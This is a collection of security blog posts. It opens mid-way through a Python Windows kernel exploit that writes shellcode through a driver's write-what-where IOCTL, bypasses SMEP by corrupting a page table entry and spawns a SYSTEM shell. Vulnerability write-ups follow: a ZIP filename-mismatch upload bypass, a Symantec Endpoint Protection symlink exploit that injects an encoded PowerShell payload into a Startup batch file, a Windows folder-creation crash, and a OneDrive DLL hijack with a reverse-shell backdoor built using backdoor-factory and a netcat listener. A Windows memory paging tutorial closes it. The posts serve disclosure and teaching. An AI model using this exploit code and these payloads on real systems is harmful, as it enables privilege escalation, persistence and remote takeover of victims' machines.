print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x830..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_seven_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
eighth_shellcode = c_ulonglong(0x4800000358888948)

# Write-what-where structure #9
www_shellcode_eight = WriteWhatWhere_Shellcode_8()
www_shellcode_eight.What_Shellcode_8 = addressof(eighth_shellcode)
www_shellcode_eight.Where_Shellcode_8 = KUSER_SHARED_DATA + 0x838
www_shellcode_eight_pointer = pointer(www_shellcode_eight)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x838..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_eight_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Last 8 bytes
ninth_shellcode = c_ulonglong(0x0000000000C3C031)

# Write-what-where structure #10
www_shellcode_nine = WriteWhatWhere_Shellcode_9()
www_shellcode_nine.What_Shellcode_9 = addressof(ninth_shellcode)
www_shellcode_nine.Where_Shellcode_9 = KUSER_SHARED_DATA + 0x840
www_shellcode_nine_pointer = pointer(www_shellcode_nine)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x840..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_nine_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Phase 3: Extract KUSER_SHARED_DATA + 0x800's PTE control bits

# Declaring C void pointer to stores PTE control bits
pte_bits_pointer = c_void_p()

# Write-what-where structure #11
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = kuser_shared_data_800_pte_address
www_pte_bits.Where_PTE_Control_Bits = addressof(pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# CTypes way of extracting value from a C void pointer
pte_control_bits_no_execute = struct.unpack('<Q', pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for KUSER_SHARED_DATA + 0x800: {:016x}".format(pte_control_bits_no_execute)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(pte_control_bits_execute)

# Write-what-where structure #12
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = kuser_shared_data_800_pte_address
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Overwriting KUSER_SHARED_DATA + 0x800's PTE..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Print update for PTE overwrite round 2
print "[+] KUSER_SHARED_DATA + 0x800 is now executable! See you later, SMEP!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f43b0

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Declaring KUSER_SHARED_DATA + 0x800 address again as a c_ulonglong to satisy c_void_p type from strucutre.
KUSER_SHARED_DATA_LONGLONG = c_ulonglong(0xFFFFF78000000800)

# Write-what-where structure #13
www = WriteWhatWhere()
www.What = addressof(KUSER_SHARED_DATA_LONGLONG)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")


Final Thoughts

I really enjoyed this method of SMEP bypass! I also loved circumventing SMEP all together and bypassing NonPagedPoolNx via KUSER_SHARED_DATA+0x800 without the need for user mode memory!

I am always looking for new challenges and decided this would be a fun one!

If you would like to take a look at how SMEP can be bypassed via U/S bit corruption in C, here is this same exploit written in C (note - some offsets may be different).

As always, feel free to reach out to me with any questions, comments, or corrections! Until then!

Peace, love, and positivity! :-)

Spending a night reading the .ZIP File Format Specification

By: admin
30 April 2020 at 09:20

One night I was bored and I wanted something to read. Some people prefer novels, others prefer poems, I prefer an RFC or an specification. So I started to read the .ZIP File Format Specification .

The overall format of a .ZIP file can be found in paragraph 4.3.6 of the specification and is the following:

 4.3.6 Overall .ZIP file format:

      [local file header 1]
      [encryption header 1]
      [file data 1]
      [data descriptor 1]
      [local file header n]
      [encryption header n]
      [file data n]
      [data descriptor n]
      [archive decryption header] 
      [archive extra data record] 
      [central directory header 1]
      [central directory header n]
      [zip64 end of central directory record]
      [zip64 end of central directory locator] 
      [end of central directory record]

Lets take a closer look at local file header and central directory structure

 4.3.7  Local file header:

      local file header signature     4 bytes  (0x04034b50)
      version needed to extract       2 bytes
      general purpose bit flag        2 bytes
      compression method              2 bytes
      last mod file time              2 bytes
      last mod file date              2 bytes
      crc-32                          4 bytes
      compressed size                 4 bytes
      uncompressed size               4 bytes
      file name length                2 bytes
      extra field length              2 bytes

      file name (variable size)
      extra field (variable size)
4.3.12 Central directory structure:

      [central directory header 1]
      [central directory header n]
      [digital signature]

      File header:
          central file header signature   4 bytes (0x02014b50)
          version made by                 2 bytes
          version needed to extract       2 bytes
          general purpose bit flag        2 bytes
          compression method              2 bytes
          last mod file time              2 bytes
          last mod file date              2 bytes
          crc-32                          4 bytes
          compressed size                 4 bytes
          uncompressed size               4 bytes
          file name length                2 bytes
          extra field length              2 bytes
          file comment length             2 bytes
          disk number start               2 bytes
          internal file attributes        2 bytes
          external file attributes        4 bytes
          relative offset of local header 4 bytes

          file name (variable size)
          extra field (variable size)
          file comment (variable size)

Did you see that? The file name can be found in two places . In local file header and in central directory structure under the File header

I was trying to find which file name I MUST use, when I extract the .zip file, but I was not able to find anything. This makes me wonder, what will happen if a zip archive contains one file name in the Local file header and a different one in File header of the central directory structure?

In order to test that, I created a .ZIP file which uses the file name “test.txt” in the local file header and the file name “test.exe” in the File header. The file is the same. The file is an executable. The only difference is the file name .

part of

I have highlighted the hex values which indicate the start of the local file header and the one of the file header respectively. I have also highlighted the different file names.

I tested the above .ZIP file with different programs, libraries and sites.

It seems, that the (default/pre-installed) programs which are being used in order to unzip .ZIP files, in Linux and Windows, as well as the majority of the commercial and non commercial products, are mostly based on the file name which exists in the file header and not in the local file header .

However, there are exceptions in this rule. In fact there are many exceptions. Dropbox and JSZip (A library for creating, reading and editing .ZIP files with JavaScript, with more than 3.000.000 downloads weekly) are only two of them.


As it is presented, when we preview the .ZIP file in Dropbox, we can see that it contains a file with file name test.txt. However, when we download it we see another file name, the test.exe .


The same with JSZip. As we can observe, when we read the contents of the zip archive, we find a text file. However, when we extract it, we have an executable. The unzip detects that there is a different file name in the file header and a different one in the local file header


I didn’t see that coming. If you drag and drop the file, you get a test.exe . However, if you choose to extract the contents you get a test.txt

This behavior can lead to major vulnerabilities, and we would be more than happy to hear your story or idea, if you come up with something.

One scenario would be the following:

Let’s assume that a zip archive contains an executable, the test.exe. The .ZIP uses the file name “test.txt” in the “Local file header” and “test.exe” in the “file header” .
A site owner does not allow .ZIP files containing “*.exe” files to be uploaded to her server, so her web application checks with JSZip that the .ZIP does not contain files with “.exe” extension.
The JSZip, will report that the .ZIP contains the text file “test.txt” and thus the web application will allow the user to upload it.
However, if the web application does not extract .ZIP file with the JSZip, but instead of that, the site owner sends by e-mail these .ZIP files, or she does the extraction with the default windows unzip or with winrar or with the linux unzip, the “test.exe” is extracted.

What could possibly go wrong?



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RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at


Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at


Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at


Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at

The post Spending a night reading the .ZIP File Format Specification appeared first on REDYOPS Labs.

1-click RCE on Keybase

27 April 2020 at 18:00
TL;DR Keybase clients allowed to send links in chats with arbitrary schemes and arbitrary display text. On Windows it was possible to send an apparently harmless link which, when clicked, could execute arbitrary commands on the victim’s system. Introduction Keybase is a chat, file sharing, git, * platform, similar to Slack, but with a security in-depth approach. *Everything* on Keybase is encrypted, allowing you to relax while syncing your private files on the cloud.

Symantec Endpoint Protection (SEP) 14.2 RU2 Elevation of Privileges (CVE-2020-5837)

By: admin
27 April 2020 at 10:06


Assigned CVE: CVE-2020-5837 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 22/12/2019

Exploit Code:

Vendor’s Advisory:

An Elevation of Privilege (EoP) exists in SEP 14.2 RU2 . The latest version we tested is SEP Version 14(14.2 RU2 MP1) build 5569 (14.2.5569.2100). The exploitation of this EoP , gives the ability to a low privileged user to create a file anywhere in the system. The attacker partially controls the content of the file. There are many ways to abuse this issue. We chose to create a bat file in the Users Startup folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat because we believe it is a good opportunity to present an interesting method we used, in order to bypass restrictions of this arbitrary write where we could control only partially the content .


Whenever Symantec Endpoint Protection (SEP) performs a scan, it uses high privileges in order to create a log file under the folder

C:\Users\user\AppData\Local\Symantec\Symantec Endpoint Protection\Logs\

An attacker can create a SymLink in order to write this file anywhere in the system. As for example the following steps will force SEP to create the log file under the

“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat”

  1. Delete the “Logs” sub folder (Shift+Delete) from the  “C:\Users\attacker\AppData\Local\Symantec\Symantec Endpoint Protection\” folder.  
  2. Execute the following:
CreateSymlink.exe "C:\Users\attacker\AppData\Local\Symantec\Symantec Endpoint Protection\Logs\12222019.Log" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat"

Note: The file 12222019.Log is in format mmddyyyy.log . Depending on the day you exploit, you have to choose the right name.

CreateSymlink is opensource and can be found in the following URL: .

The log files contain data which are partially controlled by the attacker, allowing commands to be injected into the log files. With symbolic links, we can write log files in other file formats which can lead to an EoP.

An easy way to inject code in the log files, is by naming a malicious file to


and scan it. This will trigger the scan and a log entry with the injected command will be created. This is caused because the filename “m&command&sf.exe” of the malicious file is being referenced in the log files. Combining this with the SymLinks, the attacker can create the valid bat file  “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat” .


In order to Exploit the issue you can use our exploit from our GitHub .

In the following paragraph a step by step explanation of the Video PoC where we use the exploit, is provided.

Video PoC Step By Step

The exploit takes 2 arguments. The first argument is the file we want the logs to be written in. The second argument, is the payload we want to inject in the logs file. If you can recall, the “payload” we are going to inject is nothing more than the filename of the malicious file which we are going to scan. So the following command will cause the SEP to create its log file to

c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat

and the malicious file we are going to scan, will have the name


Yes i know… this is a strange name for a file, but it is what it is 🙂

Exploit.exe "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat" "& powershell.exe -Enc YwBtAGQALgBlAHgAZQAgAC8AQwAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAMQAuAGUAeABlAA== & REM"

If you decode the base64 you will have the command cmd.exe /C C:\Users\Public\1.exe

A user with low privileges can copy any file under the C:\Users\Public\ folder.

00:00 – 00:43: We present the environment; a user with low privileges, the windows version, the SEP version and the DACL of the “StartUp” folder.

00:43 – 01:18: We run the exploit. The file backdoor.bat is created and its content contains our payload.

01:18 – 01:48: We copy the calculator to C:\Users\Public\1.exe . The payload will execute anything in C:\Users\Public\1.exe . We copied the calculator for the PoC, but you can put any executable you want.

01:48 – end: When a user logs into the system (an administrator in the PoC), the file c:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat is executed. This file contains lines of content, which are not valid commands. However, our payload is a valid command and it will be executed. As result powershell will execute the cmd.exe /C C:\Users\Public\1.exe and the calculator (1.exe) pops up.

It is worth mentioning, that we can also write to files which already exist. As for example we can write the contents of the log files in the C:\windows\win.ini file. This is useful if you want to delete a file. Name your malicious file, with a malicious filename and the AV will do the rest for you 🙂 .



You can find the exploit code in our GitHub at

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at


Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at


Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at


Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at

The post Symantec Endpoint Protection (SEP) 14.2 RU2 Elevation of Privileges (CVE-2020-5837) appeared first on REDYOPS Labs.

Windows Denial of Service Vulnerability (CVE-2020-1283)

By: admin
27 April 2020 at 09:54


Assigned CVE: CVE-2020-1283 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 11/03/2020

Exploit Code

Vendor’s Advisory:

This issue has the following description on Microsoft’s advisory:

” A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding.

To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application or to convince a user to open a specific file on a network share. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to cause a target system to stop responding.

The update addresses the vulnerability by correcting how Windows handles objects in memory.”

We will use a different description, based on the exploit we provided to Microsoft in order to abuse this vulnerability. Our description, may not be technically as accurate as Microsoft’s description, but our approach may allow someone out there to take this vulnerability beyond the DOS.

An arbitrary folder creation exists on Windows 10 1909. This specific case allows a user with low privileges to create an empty folder, with any chosen name, anywhere in the system. The folders we create inherit their DACL and thus we couldn’t find a way to exploit the issue in order to perform an Escalation of Privilege. However, we are able to exploit any arbitrary file/folder creation in order to cause a Blue Screen of Death (BSoD). The latest version we tested is windows 10 1909 (OS Build 18363.778) 64bit .


A user with low privileges (the “attacker”), has full control over the folder c:\Users\attacker\AppData\Roaming\Microsoft\Windows . This, allows him to rename the folder to c:\Users\attacker\AppData\Roaming\Microsoft\Windows2 .

If a user/attacker performs the aforementioned rename action, there are specific circumstances and actions which can be followed in order to force the NT AUTHORITY\SYSTEM to recreate the following folders:

  • c:\Users\attacker\AppData\Roaming\Microsoft\Windows\Recent
  • c:\Users\attacker\AppData\Roaming\Microsoft\Windows\Libraries

An attacker, can replace those folders with symlinks pointing to a non-existent folder somewhere in the system. When the NT AUTHORITY\SYSTEM tries to recreate the folders “Recent” and “Libraries”, will follow those symlinks and will create the non-existent folder. This way the attacker can create a folder with a chosen name, anywhere in the system.


  1. Login with a user with low privileges. Assume this user has the username “attacker”.
  2. Rename the folder C:\Users\attacker\AppData\Roaming\Microsoft\Windows to C:\Users\attacker\AppData\Roaming\Microsoft\Windows2
  3. Run the Exploit.exe (you can find the code on our GitHub) and use as arguments the two folders you want to create. As for example:
Exploit.exe c:\windows\system32\cng.sys c:\windows\addins\whateverFolder

The exploit assumes that your username is attacker. If you want to use another username, change the hard-coded paths to the exploit code and recompile.

  1. Click the Start Button and open the “Microsoft Solitaire Collection” or “Xbox Game Bar” from the right panel. Usually one of both will trigger the creation of the arbitrary folders.
  2. Check that the folders have been created.

The creation of the folder c:\windows\system32\cng.sys will cause a DoS in the next reboot and the system will need to be repaired.

Video PoC Step By Step

The exploit takes 2 arguments. These are the two folders we want to create. As for example

Exploit.exe c:\windows\system32\folder1 c:\windows\addins\folder2

will create the folders c:\windows\system32\folder1 and c:\windows\addins\folder2 . However, you will not be able to write anything inside those folders.

00:00-00:30: Presentation of the environment. We present the user with the low privileges and the fact that the folders c:\windows\system32\cng.sys c:\windows\addins\whateverFolder do not exist in the system.

00:30 – 00:49: We run the Exploit, but it fails because we have not renamed the C:\Users\attacker\AppData\Roaming\Microsoft\Windows . First we have to rename this folder.

00:49 – 01:22: We rename the folder C:\Users\attacker\AppData\Roaming\Microsoft\Windows to C:\Users\attacker\AppData\Roaming\Microsoft\Windows2 and we run the exploit again. At this point, the exploit will create all the appropriate symlinks.

01:22 – 02:17: We open the “Xbox Game Bar” which triggers the creation of the Libraries and Recent folders. As we can observe in the Explorer, the folder c:\windows\system32\cng.sys was created. We present that both folders , c:\windows\system32\cng.sys and c:\windows\addins\whateverFolder, have been created and the owner is the “Administrators”.

02:17 – end: We reboot the system and we have the BSoD. The BSoD is caused because of the folder c:\windows\system32\cng.sys. If you choose a folder with another name, it will not cause the BSOD.

If you find a better way to use this primitive and you are willing to share, we would love to hear from you or read your write-up.



You can find the exploit code on our Github at

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at


Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at


Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at


Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at

The post Windows Denial of Service Vulnerability (CVE-2020-1283) appeared first on REDYOPS Labs.

OneDrive < 20.073 Escalation of Privilege

By: admin
27 April 2020 at 07:30


Assigned CVE: Microsoft has publicly acknowledged and patched the issue. However, when we asked for the CVE number, Microsoft replied to us that the purpose of a CVE is to advise customers on the security risk and how to take action to protect themselves. Microsoft issues CVEs for MS products that require users to take action to update their environments . Although we have seen CVEs for OneDrive in the past, we respect their decision not to issue a CVE number.

Known to Neurosoft’s RedyOps Labs since: 31/03/2020

Exploit Code

Vendor’s Acknowledgement : (March 2020)

Important note regarding the patch:  Ensure that you have OneDrive >= 20.073. If you don’t, you can download the Rolling out version of the Production Ring (20.084.0426.0007), from this link 

An Escalation of Privileges (EoP) exists in OneDrive < 20.073. The latest version we tested is OneDrive 19.232.1124.0012 and Insider Preview version 20.052.0311.0010 . The exploitation of this EoP , gives the ability to a user with low privileges to gain access as any other user. In order for the exploitation to be successful, the targeted user must interact with the OneDrive (e.g right click on the tray icon) in order for the attacker to gain access .


The vulnerability arises because the OneDrive is missing some QT folders and tries to locate them from C:\QT. The C:\QT folder does not exist by default and any user with low privileges can create it. If an attacker creates the file C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\qmldir with the following contents:

module QtQuick 
plugin qtquick2plugin 
classname QtQuick2Plugin 
typeinfo plugins.qmltypes 

The OneDrive will try to load the C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\qtquick2plugin.dll . As far as the attacker can place a backdoor in the qtquick2plugin.dll , the OneDrive will load the backdoor.


The exploit can be found in our GitHub.

Today, the provided backdoor is being detected by Defender. Bypassing Defender is not the scope of this blog-post. Our purpose is not to bypass the defender AV but to provide a Proof of Concept (PoC) of the EoP. Thus first add an exception to the Defender for the folder C:\QT (or for the provided backdoor file qtquick2plugin.dll )

  1. Login as a low privileged user
  2. Close your OneDrive
  3. Copy paste the provided QT folder under the C: drive. After the copy paste, you should have the following files in your system:
  • C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\qtquick2plugin.dll (This the qtquick2plugin.dll in which we have added a backdoor for reverse shell)
  • C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\qmldir
  • C:\Qt\Qt-5.11.1\qml\QtQuick.2.7\ (this file is not needed. It’s the original qtquick2plugin.dll file.

In order for the exploitation to take place, the victim must login into the system and interact with the OneDrive. If you want to verify the exploitation perform the following:

  1. Logout
  2. Login as another user. For example perform a login as an Administrator.
  3. Right click on the tray icon of the OneDrive
  4. You should receive a reverse shell from the Administrator to your C2C.

The provided qtquick2plugin.dll contains a reverse shell which has been configured to return to the ip address and port 8080 .

Supporting materials

In order to backdoor the qtquick2plugin.dll , we used the following:

  1. The original file qtquick2plugin.dll (you can find one under the folder “C:\Users\youruser\AppData\Local\Microsoft\OneDrive\19.232.1124.****\qml\QtQuick.2\” )
  2. the the-backdoor-factory from
  3. Create the backdoor with the following command line:

./ -f qtquick2plugin.dll -H ip -P port -s reverse_shell_tcp_inline -a

Wait for the reverse shell with a netcat “nc -nlvp port”

Video PoC



You can find the exploit code in our Github at

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at


Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at


Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at


Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at

The post OneDrive < 20.073 Escalation of Privilege appeared first on REDYOPS Labs.

Turning the Pages: Introduction to Memory Paging on Windows 10 x64

26 April 2020 at 00:00


0xFFFFFFFF11223344 is an example of a virtual memory address, and anyone who spends a lot of time inside of a debugger may be familiar with this notion. “Oh, that address is somewhere in memory and references X” may be an inference that is made about a virtual memory address. I always wondered where this address schema came from. It wasn’t until I started doing research into kernel mode mitigation bypasses that I realized learning where these virtual addresses originate from is a very important concept. This blog will by no means serve as a complete guide to virtual and physical memory in Windows, as it could EASILY be a multi series blog post. This blog is meant to serve as the prerequisite knowledge needed to do things like change permissions of a memory page in kernel mode with a vulnerability such as a write-what-where bug to bypass kernel mitigations such as SMEP or NonPagedPoolNx through page table entries.

Let’s dive into memory paging, and see where these virtual memory addresses originate from and what we can learn from these seemingly obscured 8 bytes we stumble across so copiously.

Firstly, before we begin, if you want a full fledged low level explanation of nearly every aspect of memory in Windows (which far surpasses the scope of this blog post) I HIGHLY suggest reading What Makes It Page?: The Windows 7 (x64) Virtual Memory Manager written by Enrico Martignetti. In addition to paging, we will look at some ways we can use WinDbg to automate some of the more admittedly cumbersome steps in the memory paging process.

Paging? ELI5?

Memory paging refers to the implementation of virtual memory by the MMU (memory management unit). Virtual memory is mapped to physical memory, known as RAM (and in some cases, actually to disk temporarily if physical memory needs to be optimized elsewhere).

One of the main reasons that memory paging is generally enabled, is the concept of “resource sharing”. For example, if we have two instances of the calc.exe - these two instances can share physical memory. Sharing physical memory is very important, as RAM is an expensive resource.

Take a look at the below image, from the Windows Internals, Part 1 (Developer Reference) 7th Edition book to get a better understanding visually of virtual to physical memory mapping.

In addition to this information, it is important to note that a physical memory page is generally 4 KB (2 MB and even 1 GB pages can be addressed, but that is beyond the scope of this blog) in size on x64 Windows. We will see how this comes to fruition in upcoming sections of this post.

Before diving straight in to some of the lower level details, it is important to note there are a few different “paging modes” that can be utilized. Paging modes refer to the way paging is executed. The paging mode we will be referring to and using (as is default on basically every x64 version of Windows) is Long-Mode Paging.

Are We There Yet?

If we want to understanding WHAT paging actually does, let’s take a look a moment and analyze how paging is actually enabled! Looking at some of the control registers will show us if/how paging is enabled and what paging mode are we using.

According to the Intel 64 and IA-32 Architectures Software Developer’s Manual, the CR0 register is responsible for paging being enabled.

CR0.PG refers to the 31st bit of the CR0 register. If this bit is set to 1, paging is enabled. If it is set to 0, paging is disabled.

The above image is from a default installation of Windows 10 x64, showing the 31st bit of the CR0 bit is set to 1.

We now know that paging is enabled based on the image above - but what kind of paging are we using? Referring again to the Intel manual, we notice that the CR4 control register is responsible for implementing the paging mode we are using.

As mentioned previously, the paging mode we are using is called Long-Mode Paging. Long-Mode Paging is another way of saying that Physical Address Extension, or PAE, is enabled. PAE enables 64-bit paging. If PAE was disabled, only 32-bit paging would be possible.

The 5th bit of the CR4 register is responsible for PAE being enabled. 1 = enabled, 0 = disabled.

We can also see, on a default installation of Windows 10 x64, PAE is enabled by default.

Now that we know how to identify IF and WHAT KIND of paging is enabled, let’s get into virtual to physical address translation!

Let’s Get Physical!

The easiest way to think about a virtual memory address, and where it comes from, is to look at it from a different perspective. Don’t take it at face value. Understanding what the virtual address is trying to accomplish, will surely shed some light on this whole process.

A virtual address is simply a computation of various indexes into several paging structures used to fetch the corresponding physical page to a virtual page.

Take a look at the image below, taken from the AMD64 Architecture Programmer’s Manual Volume 2.

Although this image above looks very intimidating, let’s break it down.

As we can see, the virtual address in this case is a 64-bit virtual address. The first portion of the address, bits 63-48, are represented as “Sign Extend”. Let’s leave this on the back burner for the time being.

We can see there are four paging structures in use:

  1. Page-Map Level-4 Table (PML4) (Bits 47-39)
  2. Page-Directory-Pointer Table (PDPT) (Bits 38-30)
  3. Page-Directory Table (PDT) (Bits 29-21)
  4. Page Table (PT) (Bits 20-12)

Each 8 bits of a virtual address (47-39, 38-30, 29-21, 20-12, 11-0) are actually just indexes of various paging structure tables.

In addition, each paging structure table contains 512 page table entries (PxE).

So in totality, each paging structure is really a table with 512 entries each.

For each physical memory page the MMU wants to attribute to a virtual memory page, the MMU will access an entry from each table (a page table entry) that will “lead us” to the next paging structure in line.This process will go on, until a final 4 KB physical page (more on this later) is retrieved.

Think of it as needing to pick a specific entry from each table to reach our final 4 KB physical memory page. We will get into some very high level mathematical computations on how this is done later, and seeing the exact anatomy of a virtual address in WinDbg.

Now that we have some high level understanding of the various paging structures, and before diving into the paging structures and the CR3 register (PML4, I am looking at you) - let’s circle back to bits 63-48, which are represented as “Sign Extend

Canonical Addressing

In a 64-bit architecture, each virtual memory address has a total of 8 bytes, compared to a 4 byte x86 virtual memory address.

Referring back to the above section, we can recall that bits 63-48 are not accessing any paging structures. What is the purpose of this? It has to do with the limitations of the MMU.

